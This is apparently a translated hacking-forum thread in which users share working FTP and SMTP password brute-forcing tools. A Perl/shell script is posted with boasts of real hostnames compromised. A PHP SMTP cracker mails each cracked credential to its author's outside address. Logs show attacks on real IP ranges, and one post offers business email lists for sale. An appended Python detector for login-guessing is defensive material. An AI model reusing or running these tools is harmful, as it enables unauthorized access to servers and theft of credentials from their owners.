galford

  1. The link is no longer valid. Rehost!
  2. Thanks hKr for the tips. I'll test it tomorrow and come back with feedback. LE: Tested and it works like a charm. A tip for removing C blocks from the IP list:

         awk -F. '!class[$1,$2,$3] { print $0; class[$1,$2,$3]=1; }' < lista_hosts > newfile
  3. Anyway... the most efficient SMTP brute-forcers with sendemail support are not public. At least I made mine myself after spending 3 days on forums, unix.com and reading dozens of tutorials. So if you want something efficient, grab a crate of Coca-Cola, arm yourself with patience and get to work. I made a post earlier with the brute script I use. From there you can manage on your own. Good luck!
  4. Get them from Google. There are tons! http://ftp.sliim-projects.eu/wordlists/ for example
  5. How it works. It brute-forces user/password pairs (defined in the file pass_file) against all the hostnames in a file (line by line, default file logfile), saving ip user password to a defined file (ftp.log). I did not make it multi-threaded because, honestly, I was too lazy. Source:

     do

         for ip in $(cat logfile)
         do
           while read USR PAS
           do
             perl x.pl $ip $USR $PAS
           done < pass_file
         done

     x.pl

         #!/usr/bin/perl
         use Net::FTP;
         my $host = $ARGV[0];
         my $user = $ARGV[1];
         my $pass = $ARGV[2] || "";
         my $port = "21";
         $ftp=Net::FTP->new("$host", Port=>"$port", Timeout => 5) or die("couldn't connect to host:" . $host . " on port " . $port);
         if($ftp->login("$user","$pass")) {
             print "Login found: $host $user $pass\n";
             open (MYFILE, '>>ftp.log');
             print MYFILE "$host $user $pass\n";
             close (MYFILE);
         }
         $ftp->close();

     Example pass_file:

         shop shop
         sales sales
         orders orders
         shop password
         shop 123456

     Someone should make it multithreaded and post it here. And also add that, if an IP in the list times out ... it moves on to the next IP instead of sitting there trying all the passwords.

     Galford D. Weller - galford@inbox.com

     Hostnames owned with this tool: www.atminformatica.com.br movie.cluecian.com mail.orgltd.com toystory.overland.cl

     All with access to DocumentRoot. Proof of concept:

         root@admin [/dev/shm/ftpd]# cat logfile
         toystory.overland.cl
         root@admin [/dev/shm/ftpd]# ./do
         Login found: toystory.overland.cl webmaster XXXX
         root@admin [/dev/shm/ftpd]# cat ftp.log
         toystory.overland.cl webmaster XXXX

     Enjoy.

     PS: I did not write it from scratch. I just took a Perl script from Google and kept only what I need. SOURCE: http://www.perlmonks.org/bare/?displaytype=displaycode;node_id=352761
  6. You overcomplicated it enormously. You could have extracted just what you need from phpmailer.

         <?php
         error_reporting(0);
         $_UserFile = "user.file";
         $_PassFile = "pass.file";

         function S_Server($_server, $_username, $_password) {
             print "[+]Found $_username/$_password on $_server\r\n";
             if(!($_OutFile = fopen("cracked.smtp", "a"))) ExitF ("Cannot open the log file");
             fputs($_OutFile, "[+]Cracked: $_server $_username $_password\r\n");
             fclose($_OutFile);
             exit(0);
         }

         function ExitF($errmsg) {
             print "[-]" . $errmsg . "\r\n";
             exit(0);
         }

         function CrackSMTP($server, $username, $password) {
             $socket = fsockopen($server, 25, $errno, $errstr, 2);
             if (!$socket) ExitF ("SOCKET ERROR!");
             stream_set_timeout($socket, 2);
             $_SockResult = fgets($socket, 512);
             if (substr(trim($_SockResult), 0, 3) != "220") ExitF ("220 Error");
             fputs($socket, "EHLO USER\r\n");
             $_SockResult = fgets($socket, 512);
             while(substr(trim($_SockResult), 0, 4) == "250-") $_SockResult = fgets($socket, 512);
             fputs($socket, "AUTH LOGIN\r\n");
             if (!($_SockResult = fgets($socket, 512))) ExitF ("AUTH LOGIN Error");
             if (substr(trim($_SockResult), 4, 16) != "VXNlcm5hbWU6") ExitF ("RECEIVE USER PROMPT Error");
             $Encrypt_User = base64_encode($username);
             fputs($socket, "$Encrypt_User\r\n");
             if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND USER Error");
             if (substr(trim($_SockResult), 4, 16) != "UGFzc3dvcmQ6") ExitF ("RECEIVE PASSWORD PROMPT Error");
             $Encrypt_Password = base64_encode($password);
             fputs($socket, "$Encrypt_Password\r\n");
             if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND PASSWORD Error");
             if (substr(trim($_SockResult), 0, 3) != "235") {
                 print "$server: $username/$password - INVALID\r\n";
                 return "INVALID";
             }
             fputs($socket, "RSET\r\n");
             if (!($_SockResult = fgets($socket, 512))) ExitF ("RSET Error");
             fputs($socket, "MAIL FROM: admin@xoffice.com\r\n");
             if (!($_SockResult = fgets($socket, 512))) ExitF ("MAIL FROM Error");
             fputs($socket, "RCPT TO: galford@inbox.com\r\n");
             if (!($_SockResult = fgets($socket, 512))) ExitF ("RCPT TO Error");
             fputs($socket, "DATA\r\n");
             if (!($_SockResult = fgets($socket, 512))) ExitF ("DATA Error");
             fputs($socket, "Content-Type: text/html\r\n");
             fputs($socket, "SUBJECT: Elite Server $server $username $password\r\n");
             fputs($socket, "FROM: SMTP Admin <admin@xoffice.com>\r\n");
             fputs($socket, "TO: galford@inbox.com\r\n");
             fputs($socket, "\r\n Happy New Year\r\n $server $username $password\r\n. \r\n");
             fputs($socket, "QUIT\r\n");
             fclose($socket);
             S_Server ($server, $username, $password);
             exit(0);
         }

         if (!($_SRV = $argv[1])) ExitF ("Usage: $argv[0] <hostname>");
         if (!($F_UserFile = fopen($_UserFile, "r"))) ExitF ("Cannot open the username file");
         $_Var = 0;
         $_Counter = 0;
         while (!feof($F_UserFile)) {
             $_username = fgets($F_UserFile, 64);
             $username = str_replace("\n", "", $_username);
             if ($username != "") {
                 $user[$_Var] = $username;
                 $pass[$_Var] = $username;
                 $_Var++;
                 $_Counter = $_Counter + 1;
                 $user[$_Var] = $username;
                 $pass[$_Var] = $username . "1";
                 $_Var++;
                 $_Counter = $_Counter + 1;
                 $user[$_Var] = $username;
                 $pass[$_Var] = $username . "12";
                 $_Var++;
                 $_Counter = $_Counter + 1;
                 $user[$_Var] = $username;
                 $pass[$_Var] = $username . "123";
                 $_Var++;
                 $_Counter = $_Counter + 1;
                 if (!($F_PassFile = fopen($_PassFile, "r"))) ExitF ("Cannot open the password file");
                 while (!feof($F_PassFile)) {
                     $user[$_Var] = $username;
                     $pass[$_Var] = fgets($F_PassFile, 64);
                     $pass[$_Var] = str_replace("\n", "", $pass[$_Var]);
                     $_Var++;
                     $_Counter++;
                 }
                 fclose($F_PassFile);
             }
         }
         fclose ($F_UserFile);
         for ( $_Var = 0; $_Var < $_Counter; $_Var++ ) CrackSMTP($_SRV, $user[$_Var], $pass[$_Var]);
         exit(0);
         ?>

     Try this procedure. It is cleaner and causes absolutely no load average.
         root@admin [/dev/shm/.img]# ps -eaf | grep -c smtp.php
         99
         root@admin [/dev/shm/.img]#

     Look at the load average with 99 processes started:

         root@admin [/dev/shm/.img]# w
         20:42:21 up 1 day, 3 min, 2 users, load average: 0.37, 0.50, 0.68

     My SMTP brute looks something like this in action:

         109.167.132.120: antonio/letmein - INVALID
         109.168.123.58: test/mypass - INVALID
         109.164.235.34: henry/1234567 - INVALID
         109.123.106.182: charles/charles - INVALID
         109.168.125.210: online/online - INVALID
         109.168.122.135: spam/secret - INVALID
         109.164.219.206: patrick/letmein - INVALID
         109.164.235.113: gary/secret - INVALID
         109.168.58.134: benjamin/12345678 - INVALID
         109.168.123.54: test/123456789 - INVALID
         109.164.235.168: henry/password - INVALID
         109.168.31.114: randy/123456789 - INVALID
         109.164.143.33: roger/roger - INVALID
         109.168.28.18: billy/billy123 - INVALID
  7. Tested and it works. Still, if you could also add send email support. Having it use an external *.html as the message body and, in another file, mail to: and mail from: etc. etc. would be excellent. Greets from BZ.
  8. I am also selling fresh business emails from the USA, a great many of them.
  9. Even in 2009 they were useless. Around 2004-2005 they were somewhat effective.
  10. rpc.cachefsd and rpc.cmdsol were exploitable a while back. It only works on unpatched Solaris 2.6/2.7. Useless, just like the one for sadmind. That was long ago...
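
Seen from the server side, the loops in posts 5 and 6 show up as one source address producing a run of failed logins across several account names in a short time. The following sliding-window detector is an added example for defenders, not code from any forum post. The log format, the sample lines and the thresholds are constructed assumptions, and `parse_line()` has to be adapted to the real FTP or SMTP server log.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in a hypothetical "timestamp event ip=... user=..." format.
SAMPLE_LOG = """\
2024-01-01T20:42:01 auth_failed ip=203.0.113.7 user=henry
2024-01-01T20:42:02 auth_failed ip=203.0.113.7 user=henry
2024-01-01T20:42:03 auth_failed ip=203.0.113.7 user=gary
2024-01-01T20:42:04 auth_failed ip=198.51.100.9 user=alice
2024-01-01T20:42:05 auth_failed ip=203.0.113.7 user=roger
2024-01-01T20:42:06 auth_failed ip=203.0.113.7 user=billy
2024-01-01T20:50:00 auth_failed ip=198.51.100.9 user=alice
2024-01-01T20:50:30 auth_ok ip=198.51.100.9 user=alice
"""

def parse_line(line):
    """Return (timestamp, event, ip, user), or None for a line that does not match."""
    parts = line.split()
    if len(parts) != 4:
        return None
    try:
        ts = datetime.fromisoformat(parts[0])
        fields = dict(p.split("=", 1) for p in parts[2:])
        return ts, parts[1], fields["ip"], fields["user"]
    except (ValueError, KeyError):
        return None

def find_guessing_sources(lines, window=timedelta(minutes=5),
                          max_failures=5, max_users=3):
    """Map each flagged source IP to (failures, distinct users) at the moment it tripped.

    Assumes the lines are in chronological order, as in a server log.
    """
    recent = defaultdict(deque)  # ip -> failed attempts still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[1] != "auth_failed":
            continue
        ts, _, ip, user = rec
        q = recent[ip]
        q.append((ts, user))
        while ts - q[0][0] > window:  # drop attempts older than the window
            q.popleft()
        users = {u for _, u in q}
        if ip not in flagged and (len(q) >= max_failures or len(users) > max_users):
            flagged[ip] = (len(q), len(users))
    return flagged

if __name__ == "__main__":
    for ip, (fails, users) in find_guessing_sources(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {fails} failed logins across {users} usernames")
```

The user who mistypes a password twice, eight minutes apart, stays under both thresholds, while the source cycling through account names is flagged on its fifth failure.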